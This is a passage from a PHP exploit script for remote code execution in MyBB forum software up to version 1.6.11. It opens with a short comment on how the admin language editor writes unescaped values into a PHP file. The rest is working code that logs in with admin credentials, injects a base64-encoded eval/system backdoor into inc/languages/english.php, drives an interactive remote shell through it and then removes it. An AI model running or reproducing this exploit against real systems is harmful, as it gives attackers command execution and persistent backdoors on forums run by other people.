input['info'] as $key => $info) { $info = str_replace("\\", "\\\\", $info); $info = str_replace('$', '\$', $info); $newlanginfo[$key] = str_replace("\"", '\"', $info); } and Line 69: \$langinfo['admin'] = {$newlanginfo['admin']}; You can see that some chars are being replaced , however MyBB treats the variable $newlanginfo['admin'] as integer. So we can execute PHP code by just writing the function name on it. Below is a very simple exploit that does that job for you. Remember that you need the admin credentials to do that. */ echo "#######################################################################\n"; echo "# MyBB <= 1.6.11 Remote Code Execution Using Admin Privileges #\n"; echo "# By BlackDream @ p0wnbox.com #\n"; echo "#######################################################################\n\n"; if ( ! $argc ) { exit( "You can't run this script from your browser" ); } elseif ( $argc != 4 ) { die( "Example Usage: php " . basename( __file__ ) . " \n\nProvide the myBB forum URL WITHOUT the admin panel directory\n" ); } $url = $argv[1]; $username = $argv[2]; $password = $argv[3]; //Is this URL A Valid MyBB Forum? std_echo( "Validate URL...", "*" ); if ( ! ValidateMyBB( $url ) ) { std_echo( "Couldn't Validate URL", "-" ); exit( 1 ); } //Login std_echo( "Logging In...", "*" ); if ( ! login( $username, $password ) ) { std_echo( "Couldn't Login", "-" ); exit( 1 ); } std_echo( "Working...", "*" ); $key = md5( uniqid( rand(), true ) ); //generate a unique key to prevent all the others $vars_to_post = get_posted_vars( true, $key ); do_backdoor( $vars_to_post ); do { echo "shell(AV: exit)> "; $command = get_input(); $command_enc = base64_encode( $command ); echo file_get_contents( $url . "/inc/languages/english.php?key=$key&exploited=$command_enc" ); } while ( $command != "exit" ); //remove our backdoor $vars_to_post = get_posted_vars( false ); do_backdoor( $vars_to_post ); function get_input( ) { $input = trim( fgets( STDIN, 255 ) ); return $input; } function do_backdoor( $vars_to_post ) { global $url; $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url . '/admin/index.php?module=config-languages&action=edit_properties' ); curl_setopt( $ch, CURLOPT_POST, 1 ); curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $vars_to_post ) ); curl_setopt( $ch, CURLOPT_COOKIEFILE, 'cookie.txt' ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); $source = curl_exec( $ch ); } function get_posted_vars( $do_backdoor, $key = '' ) { global $url; $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url . '/admin/index.php?module=config-languages&action=edit_properties&lang=english' ); curl_setopt( $ch, CURLOPT_COOKIEFILE, 'cookie.txt' ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); $source = curl_exec( $ch ); $vars_to_post = array(); if ( preg_match( "//", $source, $matches ) ) { $vars_to_post['my_post_key'] = $matches[1]; $vars_to_post['lang'] = "english"; $vars_to_post['info[author]'] = "MyBulletinBoard"; $vars_to_post['info[website]'] = "http://www.mybb.com"; $vars_to_post['info[author]'] = "MyBulletinBoard"; $vars_to_post['info[version]'] = "1610"; $vars_to_post['info[name]'] = "English (American)"; $vars_to_post['info[htmllang]'] = "en"; $vars_to_post['info[charset]'] = "UTF-8"; $vars_to_post['info[rtl]'] = "0"; $vars_to_post['info[admin]'] = 1; //generating UNIQUE MD5 if ( $do_backdoor ) { $payload = 'if(isset($_GET["exploited"]) && $_GET["key"] == "' . $key . '") { system(base64_decode($_GET["exploited"])); }'; $payload = base64_encode( $payload ); $vars_to_post['info[admin]'] = "eval(base64_decode('$payload'))"; } return $vars_to_post; } return false; } function login( $username, $password ) { global $url; $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url . "/admin/index.php" ); curl_setopt( $ch, CURLOPT_POST, 1 ); curl_setopt( $ch, CURLOPT_POSTFIELDS, 'username=' . $username . '&password=' . $password . "&do=login" ); curl_setopt( $ch, CURLOPT_COOKIEJAR, 'cookie.txt' ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); $source = curl_exec( $ch ); return strpos( $source, 'Logged in as' ); } function ValidateMyBB( $url ) { $source = @file_get_contents( $url . "/admin/" ); if ( $source ) { return stripos( $source, "MyBB Control Panel" ); } return false; } function std_echo( $message, $ch ) { echo "[$ch] $message\n"; } ?>